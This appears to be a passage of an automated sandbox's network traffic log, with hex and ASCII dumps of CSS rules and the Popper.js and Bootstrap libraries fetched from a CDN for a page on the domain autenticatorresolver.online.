max-height:366px){}@media screen and (max-width:600px),screen and (max-height:366px){}@media screen and (max-width:600px),screen and (max-height:366px){}@media screen and (max-width:600px),screen and (max-height:366px){}@media screen and (max-width:600px)
2024-11-26 12:43:35 UTC	1369	IN	Data Raw: 63 74 69 76 65 29 7b 2e 66 31 33 68 66 76 63 6a 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 70 72 65 66 65 72 73 2d 63 6f 6e 74 72 61 73 74 3a 6d 6f 72 65 29 2c 28 66 6f 72 63 65 64 2d 63 6f 6c 6f 72 73 3a 61 63 74 69 76 65 29 7b 2e 66 6d 30 37 72 68 31 7b 62 6f 72 64 65 72 2d 6c 65 66 74 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 2e 66 37 79 32 36 78 65 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 61 63 74 69 76 65 29 7b 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 Data Ascii: ctive){.f13hfvcj{border-bottom-style:solid}}@media screen and (prefers-contrast:more),(forced-colors:active){.fm07rh1{border-left-style:solid}.f7y26xe{border-right-style:solid}}@media screen and (-ms-high-contrast:active){}@media screen and (-ms-high-cont
2024-11-26 12:43:35 UTC	1369	IN	Data Raw: 68 69 67 68 6c 69 67 68 74 7d 2e 66 77 62 70 6b 33 35 7b 62 6f 72 64 65 72 2d 6c 65 66 74 2d 63 6f 6c 6f 72 3a 68 69 67 68 6c 69 67 68 74 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 61 63 74 69 76 65 29 7b 2e 66 68 65 30 74 64 37 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 68 69 67 68 6c 69 67 68 74 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 61 63 74 69 76 65 29 7b 2e 66 77 62 70 6b 33 35 7b 62 6f 72 64 65 72 2d 6c 65 66 74 2d 63 6f 6c 6f 72 3a 68 69 67 68 6c 69 67 68 74 7d 2e 66 39 71 34 79 71 75 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 63 6f 6c 6f 72 3a 68 69 67 68 6c 69 67 68 74 7d 7d 40 Data Ascii: highlight}.fwbpk35{border-left-color:highlight}}@media screen and (-ms-high-contrast:active){.fhe0td7{border-bottom-color:highlight}}@media screen and (-ms-high-contrast:active){.fwbpk35{border-left-color:highlight}.f9q4yqu{border-right-color:highlight}}@
2024-11-26 12:43:35 UTC	1369	IN	Data Raw: 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 61 63 74 69 76 65 29 7b 2e 66 74 78 72 30 35 38 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 61 63 74 69 76 65 29 7b 2e 66 31 78 38 6d 32 32 70 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 6c 65 66 74 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 2e 66 31 71 64 33 62 6d 36 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 61 63 74 69 76 65 29 7b Data Ascii: ia screen and (-ms-high-contrast:active){.ftxr058:hover{border-bottom-style:solid}}@media screen and (-ms-high-contrast:active){.f1x8m22p:hover{border-left-style:solid}.f1qd3bm6:hover{border-right-style:solid}}@media screen and (-ms-high-contrast:active){
2024-11-26 12:43:35 UTC	1369	IN	Data Raw: 69 64 74 68 3a 31 70 78 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 61 63 74 69 76 65 29 7b 2e 66 64 36 37 32 30 74 3a 68 6f 76 65 72 3a 66 6f 63 75 73 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 77 69 64 74 68 3a 31 70 78 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 61 63 74 69 76 65 29 7b 2e 66 31 75 35 65 69 68 72 3a 68 6f 76 65 72 3a 66 6f 63 75 73 7b 62 6f 72 64 65 72 2d 6c 65 66 74 2d 77 69 64 74 68 3a 31 70 78 7d 2e 66 31 69 6b 34 75 33 75 3a 68 6f 76 65 72 3a 66 6f 63 75 73 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 77 69 64 74 68 3a 31 70 78 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 Data Ascii: idth:1px}}@media screen and (-ms-high-contrast:active){.fd6720t:hover:focus{border-bottom-width:1px}}@media screen and (-ms-high-contrast:active){.f1u5eihr:hover:focus{border-left-width:1px}.f1ik4u3u:hover:focus{border-right-width:1px}}@media screen and (
2024-11-26 12:43:35 UTC	1369	IN	Data Raw: 61 73 74 3a 61 63 74 69 76 65 29 7b 2e 66 31 72 78 36 7a 70 6a 3a 68 6f 76 65 72 3a 66 6f 63 75 73 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 2d 6c 69 6e 65 3a 75 6e 64 65 72 6c 69 6e 65 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 61 63 74 69 76 65 29 7b 2e 66 31 79 65 65 72 62 6b 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 2d 77 69 64 74 68 3a 31 70 78 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 61 63 74 69 76 65 29 7b 2e 66 31 61 70 65 65 68 75 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 Data Ascii: ast:active){.f1rx6zpj:hover:focus{text-decoration-line:underline}}@media screen and (-ms-high-contrast:active){.f1yeerbk:focus{outline-width:1px}}@media screen and (-ms-high-contrast:active){.f1apeehu:focus{outline-style:solid}}@media screen and (-ms-high

Timestamp	Bytes transferred	Direction	Data
2024-11-26 12:43:36 UTC	575	OUT	GET /npm/@popperjs/core@2.11.8/dist/umd/popper.min.js HTTP/1.1 Host: cdn.jsdelivr.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://autenticatorresolver.online/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-26 12:43:37 UTC	776	IN	HTTP/1.1 200 OK Connection: close Content-Length: 20122 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: * Timing-Allow-Origin: * Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable Cross-Origin-Resource-Policy: cross-origin X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Content-Type: application/javascript; charset=utf-8 X-JSD-Version: 2.11.8 X-JSD-Version-Type: version ETag: W/"4e9a-hx1u8QcL02PqOQ4MjDhOR9zn84k" Accept-Ranges: bytes Age: 1075523 Date: Tue, 26 Nov 2024 12:43:36 GMT X-Served-By: cache-fra-eddf8230047-FRA, cache-ewr-kewr1740020-EWR X-Cache: HIT, HIT Vary: Accept-Encoding alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
2024-11-26 12:43:37 UTC	1378	IN	Data Raw: 2f 2a 2a 0a 20 2a 20 40 70 6f 70 70 65 72 6a 73 2f 63 6f 72 65 20 76 32 2e 31 31 2e 38 20 2d 20 4d 49 54 20 4c 69 63 65 6e 73 65 0a 20 2a 2f 0a 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 74 28 65 78 70 6f 72 74 73 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 65 78 70 6f 72 74 73 22 5d 2c 74 29 3a 74 28 28 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 65 7c 7c 73 65 6c 66 29 2e 50 6f 70 70 65 72 3d 7b 7d 29 7d Data Ascii: /** * @popperjs/core v2.11.8 - MIT License */!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?t(exports):"function"==typeof define&&define.amd?define(["exports"],t):t((e="undefined"!=typeof globalThis?globalThis:e\|\|self).Popper={})}
2024-11-26 12:43:37 UTC	1378	IN	Data Raw: 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 76 61 72 20 6e 3d 74 28 65 29 3b 72 65 74 75 72 6e 7b 73 63 72 6f 6c 6c 4c 65 66 74 3a 6e 2e 70 61 67 65 58 4f 66 66 73 65 74 2c 73 63 72 6f 6c 6c 54 6f 70 3a 6e 2e 70 61 67 65 59 4f 66 66 73 65 74 7d 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 29 7b 72 65 74 75 72 6e 20 65 3f 28 65 2e 6e 6f 64 65 4e 61 6d 65 7c 7c 22 22 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 29 7b 72 65 74 75 72 6e 28 28 6e 28 65 29 3f 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3a 65 2e 64 6f 63 75 6d 65 6e 74 29 7c 7c 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 7d 66 75 6e 63 74 69 6f 6e 20 68 28 65 29 7b 72 65 74 75 72 6e 20 70 28 64 28 65 Data Ascii: unction u(e){var n=t(e);return{scrollLeft:n.pageXOffset,scrollTop:n.pageYOffset}}function l(e){return e?(e.nodeName\|\|"").toLowerCase():null}function d(e){return((n(e)?e.ownerDocument:e.document)\|\|window.document).documentElement}function h(e){return p(d(e
2024-11-26 12:43:37 UTC	1378	IN	Data Raw: 28 6e 3d 5b 5d 29 3b 76 61 72 20 6f 3d 78 28 65 29 2c 69 3d 6f 3d 3d 3d 28 6e 75 6c 6c 3d 3d 28 72 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 29 3f 76 6f 69 64 20 30 3a 72 2e 62 6f 64 79 29 2c 61 3d 74 28 6f 29 2c 73 3d 69 3f 5b 61 5d 2e 63 6f 6e 63 61 74 28 61 2e 76 69 73 75 61 6c 56 69 65 77 70 6f 72 74 7c 7c 5b 5d 2c 76 28 6f 29 3f 6f 3a 5b 5d 29 3a 6f 2c 66 3d 6e 2e 63 6f 6e 63 61 74 28 73 29 3b 72 65 74 75 72 6e 20 69 3f 66 3a 66 2e 63 6f 6e 63 61 74 28 77 28 62 28 73 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 4f 28 65 29 7b 72 65 74 75 72 6e 5b 22 74 61 62 6c 65 22 2c 22 74 64 22 2c 22 74 68 22 5d 2e 69 6e 64 65 78 4f 66 28 6c 28 65 29 29 3e 3d 30 7d 66 75 6e 63 74 69 6f 6e 20 6a 28 65 29 7b 72 65 74 75 72 6e 20 72 28 65 29 26 26 22 66 69 78 65 64 Data Ascii: (n=[]);var o=x(e),i=o===(null==(r=e.ownerDocument)?void 0:r.body),a=t(o),s=i?[a].concat(a.visualViewport\|\|[],v(o)?o:[]):o,f=n.concat(s);return i?f:f.concat(w(b(s)))}function O(e){return["table","td","th"].indexOf(l(e))>=0}function j(e){return r(e)&&"fixed
2024-11-26 12:43:37 UTC	1378	IN	Data Raw: 72 3d 74 2e 67 65 74 28 65 29 3b 72 26 26 6f 28 72 29 7d 7d 29 29 2c 72 2e 70 75 73 68 28 65 29 7d 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 2e 73 65 74 28 65 2e 6e 61 6d 65 2c 65 29 7d 29 29 2c 65 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 2e 68 61 73 28 65 2e 6e 61 6d 65 29 7c 7c 6f 28 65 29 7d 29 29 2c 72 7d 66 75 6e 63 74 69 6f 6e 20 43 28 65 2c 74 29 7b 76 61 72 20 6e 3d 74 2e 67 65 74 52 6f 6f 74 4e 6f 64 65 26 26 74 2e 67 65 74 52 6f 6f 74 4e 6f 64 65 28 29 3b 69 66 28 65 2e 63 6f 6e 74 61 69 6e 73 28 74 29 29 72 65 74 75 72 6e 21 30 3b 69 66 28 6e 26 26 6f 28 6e 29 29 7b 76 61 72 20 72 3d 74 3b 64 6f 7b 69 66 28 72 26 26 65 2e 69 73 53 61 6d 65 4e 6f 64 65 28 72 29 29 72 Data Ascii: r=t.get(e);r&&o(r)}})),r.push(e)}return e.forEach((function(e){t.set(e.name,e)})),e.forEach((function(e){n.has(e.name)\|\|o(e)})),r}function C(e,t){var n=t.getRootNode&&t.getRootNode();if(e.contains(t))return!0;if(n&&o(n)){var r=t;do{if(r&&e.isSameNode(r))r
2024-11-26 12:43:37 UTC	1378	IN	Data Raw: 69 6f 6e 29 3e 3d 30 26 26 72 28 65 29 3f 45 28 65 29 3a 65 3b 72 65 74 75 72 6e 20 6e 28 6f 29 3f 74 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 28 65 29 26 26 43 28 65 2c 6f 29 26 26 22 62 6f 64 79 22 21 3d 3d 6c 28 65 29 7d 29 29 3a 5b 5d 7d 28 65 29 3a 5b 5d 2e 63 6f 6e 63 61 74 28 74 29 2c 63 3d 5b 5d 2e 63 6f 6e 63 61 74 28 66 2c 5b 6f 5d 29 2c 70 3d 63 5b 30 5d 2c 75 3d 63 2e 72 65 64 75 63 65 28 28 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 76 61 72 20 72 3d 49 28 65 2c 6e 2c 73 29 3b 72 65 74 75 72 6e 20 74 2e 74 6f 70 3d 69 28 72 2e 74 6f 70 2c 74 2e 74 6f 70 29 2c 74 2e 72 69 67 68 74 3d 61 28 72 2e 72 69 67 68 74 2c 74 2e 72 69 67 68 74 29 2c 74 2e 62 6f 74 74 6f 6d 3d 61 28 72 2e 62 6f 74 74 6f 6d 2c Data Ascii: ion)>=0&&r(e)?E(e):e;return n(o)?t.filter((function(e){return n(e)&&C(e,o)&&"body"!==l(e)})):[]}(e):[].concat(t),c=[].concat(f,[o]),p=c[0],u=c.reduce((function(t,n){var r=I(e,n,s);return t.top=i(r.top,t.top),t.right=a(r.right,t.right),t.bottom=a(r.bottom,
2024-11-26 12:43:37 UTC	1378	IN	Data Raw: 72 79 2c 79 3d 76 6f 69 64 20 30 21 3d 3d 76 26 26 76 2c 67 3d 72 2e 70 61 64 64 69 6e 67 2c 62 3d 76 6f 69 64 20 30 3d 3d 3d 67 3f 30 3a 67 2c 78 3d 59 28 22 6e 75 6d 62 65 72 22 21 3d 74 79 70 65 6f 66 20 62 3f 62 3a 47 28 62 2c 6b 29 29 2c 77 3d 6d 3d 3d 3d 54 3f 22 72 65 66 65 72 65 6e 63 65 22 3a 54 2c 4f 3d 65 2e 72 65 63 74 73 2e 70 6f 70 70 65 72 2c 6a 3d 65 2e 65 6c 65 6d 65 6e 74 73 5b 79 3f 77 3a 6d 5d 2c 45 3d 5f 28 6e 28 6a 29 3f 6a 3a 6a 2e 63 6f 6e 74 65 78 74 45 6c 65 6d 65 6e 74 7c 7c 64 28 65 2e 65 6c 65 6d 65 6e 74 73 2e 70 6f 70 70 65 72 29 2c 63 2c 6c 2c 73 29 2c 50 3d 70 28 65 2e 65 6c 65 6d 65 6e 74 73 2e 72 65 66 65 72 65 6e 63 65 29 2c 4d 3d 58 28 7b 72 65 66 65 72 65 6e 63 65 3a 50 2c 65 6c 65 6d 65 6e 74 3a 4f 2c 73 74 72 61 74 Data Ascii: ry,y=void 0!==v&&v,g=r.padding,b=void 0===g?0:g,x=Y("number"!=typeof b?b:G(b,k)),w=m===T?"reference":T,O=e.rects.popper,j=e.elements[y?w:m],E=_(n(j)?j:j.contextElement\|\|d(e.elements.popper),c,l,s),P=p(e.elements.reference),M=X({reference:P,element:O,strat
2024-11-26 12:43:37 UTC	1378	IN	Data Raw: 2c 70 2c 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 71 28 65 29 3b 72 65 74 75 72 6e 20 56 2e 72 65 64 75 63 65 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 72 65 74 75 72 6e 20 65 2e 63 6f 6e 63 61 74 28 74 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 70 68 61 73 65 3d 3d 3d 6e 7d 29 29 29 7d 29 2c 5b 5d 29 7d 28 28 73 3d 5b 5d 2e 63 6f 6e 63 61 74 28 6f 2c 66 2e 6f 70 74 69 6f 6e 73 2e 6d 6f 64 69 66 69 65 72 73 29 2c 70 3d 73 2e 72 65 64 75 63 65 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 65 5b 74 2e 6e 61 6d 65 5d 3b 72 65 74 75 72 6e 20 65 5b 74 2e 6e 61 6d 65 5d 3d 6e 3f 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 7d 2c 6e 2c 74 2c 7b 6f 70 74 69 6f 6e 73 3a 4f Data Ascii: ,p,d=function(e){var t=q(e);return V.reduce((function(e,n){return e.concat(t.filter((function(e){return e.phase===n})))}),[])}((s=[].concat(o,f.options.modifiers),p=s.reduce((function(e,t){var n=e[t.name];return e[t.name]=n?Object.assign({},n,t,{options:O
2024-11-26 12:43:37 UTC	1378	IN	Data Raw: 73 7d 29 2c 64 65 73 74 72 6f 79 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 28 29 2c 70 3d 21 30 7d 7d 3b 69 66 28 21 51 28 65 2c 74 29 29 72 65 74 75 72 6e 20 75 3b 66 75 6e 63 74 69 6f 6e 20 6c 28 29 7b 63 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 28 29 7d 29 29 2c 63 3d 5b 5d 7d 72 65 74 75 72 6e 20 75 2e 73 65 74 4f 70 74 69 6f 6e 73 28 72 29 2e 74 68 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 21 70 26 26 72 2e 6f 6e 46 69 72 73 74 55 70 64 61 74 65 26 26 72 2e 6f 6e 46 69 72 73 74 55 70 64 61 74 65 28 65 29 7d 29 29 2c 75 7d 7d 76 61 72 20 24 3d 7b 70 61 73 73 69 76 65 3a 21 30 7d 3b 76 61 72 20 65 65 3d 7b 6e 61 6d 65 3a 22 65 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 22 2c 65 6e 61 62 6c 65 64 3a 21 30 Data Ascii: s}),destroy:function(){l(),p=!0}};if(!Q(e,t))return u;function l(){c.forEach((function(e){return e()})),c=[]}return u.setOptions(r).then((function(e){!p&&r.onFirstUpdate&&r.onFirstUpdate(e)})),u}}var $={passive:!0};var ee={name:"eventListeners",enabled:!0
2024-11-26 12:43:37 UTC	1378	IN	Data Raw: 69 67 68 74 22 2c 54 3d 22 63 6c 69 65 6e 74 57 69 64 74 68 22 3b 69 66 28 57 3d 3d 3d 74 28 72 29 26 26 22 73 74 61 74 69 63 22 21 3d 3d 6d 28 57 3d 64 28 72 29 29 2e 70 6f 73 69 74 69 6f 6e 26 26 22 61 62 73 6f 6c 75 74 65 22 3d 3d 3d 63 26 26 28 48 3d 22 73 63 72 6f 6c 6c 48 65 69 67 68 74 22 2c 54 3d 22 73 63 72 6f 6c 6c 57 69 64 74 68 22 29 2c 57 3d 57 2c 69 3d 3d 3d 44 7c 7c 28 69 3d 3d 3d 50 7c 7c 69 3d 3d 3d 4c 29 26 26 61 3d 3d 3d 42 29 4d 3d 41 2c 62 2d 3d 28 68 26 26 57 3d 3d 3d 6b 26 26 6b 2e 76 69 73 75 61 6c 56 69 65 77 70 6f 72 74 3f 6b 2e 76 69 73 75 61 6c 56 69 65 77 70 6f 72 74 2e 68 65 69 67 68 74 3a 57 5b 48 5d 29 2d 6f 2e 68 65 69 67 68 74 2c 62 2a 3d 70 3f 31 3a 2d 31 3b 69 66 28 69 3d 3d 3d 50 7c 7c 28 69 3d 3d 3d 44 7c 7c 69 3d 3d Data Ascii: ight",T="clientWidth";if(W===t(r)&&"static"!==m(W=d(r)).position&&"absolute"===c&&(H="scrollHeight",T="scrollWidth"),W=W,i===D\|\|(i===P\|\|i===L)&&a===B)M=A,b-=(h&&W===k&&k.visualViewport?k.visualViewport.height:W[H])-o.height,b*=p?1:-1;if(i===P\|\|(i===D\|\|i==
2024-11-26 12:43:37 UTC	1378	IN	Data Raw: 65 73 2e 61 72 72 6f 77 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 7d 2c 74 2e 73 74 79 6c 65 73 2e 61 72 72 6f 77 2c 72 65 28 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 7d 2c 63 2c 7b 6f 66 66 73 65 74 73 3a 74 2e 6d 6f 64 69 66 69 65 72 73 44 61 74 61 2e 61 72 72 6f 77 2c 70 6f 73 69 74 69 6f 6e 3a 22 61 62 73 6f 6c 75 74 65 22 2c 61 64 61 70 74 69 76 65 3a 21 31 2c 72 6f 75 6e 64 4f 66 66 73 65 74 73 3a 66 7d 29 29 29 29 2c 74 2e 61 74 74 72 69 62 75 74 65 73 2e 70 6f 70 70 65 72 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 7d 2c 74 2e 61 74 74 72 69 62 75 74 65 73 2e 70 6f 70 70 65 72 2c 7b 22 64 61 74 61 2d 70 6f 70 70 65 72 2d 70 6c 61 63 65 6d 65 6e 74 22 3a 74 2e 70 6c 61 63 65 6d 65 6e 74 7d 29 7d 2c 64 61 74 61 3a 7b 7d 7d 3b 76 61 72 Data Ascii: es.arrow=Object.assign({},t.styles.arrow,re(Object.assign({},c,{offsets:t.modifiersData.arrow,position:"absolute",adaptive:!1,roundOffsets:f})))),t.attributes.popper=Object.assign({},t.attributes.popper,{"data-popper-placement":t.placement})},data:{}};var

Timestamp	Bytes transferred	Direction	Data
2024-11-26 12:43:36 UTC	571	OUT	GET /npm/bootstrap@5.3.3/dist/js/bootstrap.min.js HTTP/1.1 Host: cdn.jsdelivr.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://autenticatorresolver.online/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-26 12:43:37 UTC	774	IN	HTTP/1.1 200 OK Connection: close Content-Length: 60635 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: * Timing-Allow-Origin: * Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable Cross-Origin-Resource-Policy: cross-origin X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Content-Type: application/javascript; charset=utf-8 X-JSD-Version: 5.3.3 X-JSD-Version-Type: version ETag: W/"ecdb-LGwKWDRaCdN2EjCvgjpOSFKxJkM" Accept-Ranges: bytes Age: 559799 Date: Tue, 26 Nov 2024 12:43:36 GMT X-Served-By: cache-fra-etou8220156-FRA, cache-ewr-kewr1740033-EWR X-Cache: HIT, HIT Vary: Accept-Encoding alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
2024-11-26 12:43:37 UTC	1378	IN	Data Raw: 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 35 2e 33 2e 33 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 34 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 Data Ascii: /! Bootstrap v5.3.3 (https://getbootstrap.com/) * Copyright 2011-2024 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */!function(t,e){"ob
2024-11-26 12:43:37 UTC	1378	IN	Data Raw: 64 20 30 21 3d 3d 74 2e 6e 6f 64 65 54 79 70 65 29 2c 63 3d 74 3d 3e 6c 28 74 29 3f 74 2e 6a 71 75 65 72 79 3f 74 5b 30 5d 3a 74 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 74 2e 6c 65 6e 67 74 68 3e 30 3f 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 72 28 74 29 29 3a 6e 75 6c 6c 2c 68 3d 74 3d 3e 7b 69 66 28 21 6c 28 74 29 7c 7c 30 3d 3d 3d 74 2e 67 65 74 43 6c 69 65 6e 74 52 65 63 74 73 28 29 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 21 31 3b 63 6f 6e 73 74 20 65 3d 22 76 69 73 69 62 6c 65 22 3d 3d 3d 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 74 29 2e 67 65 74 50 72 6f 70 65 72 74 79 56 61 6c 75 65 28 22 76 69 73 69 62 69 6c 69 74 79 22 29 2c 69 3d 74 2e 63 6c 6f 73 65 73 74 28 22 64 65 74 61 69 6c 73 Data Ascii: d 0!==t.nodeType),c=t=>l(t)?t.jquery?t[0]:t:"string"==typeof t&&t.length>0?document.querySelector(r(t)):null,h=t=>{if(!l(t)\|\|0===t.getClientRects().length)return!1;const e="visible"===getComputedStyle(t).getPropertyValue("visibility"),i=t.closest("details
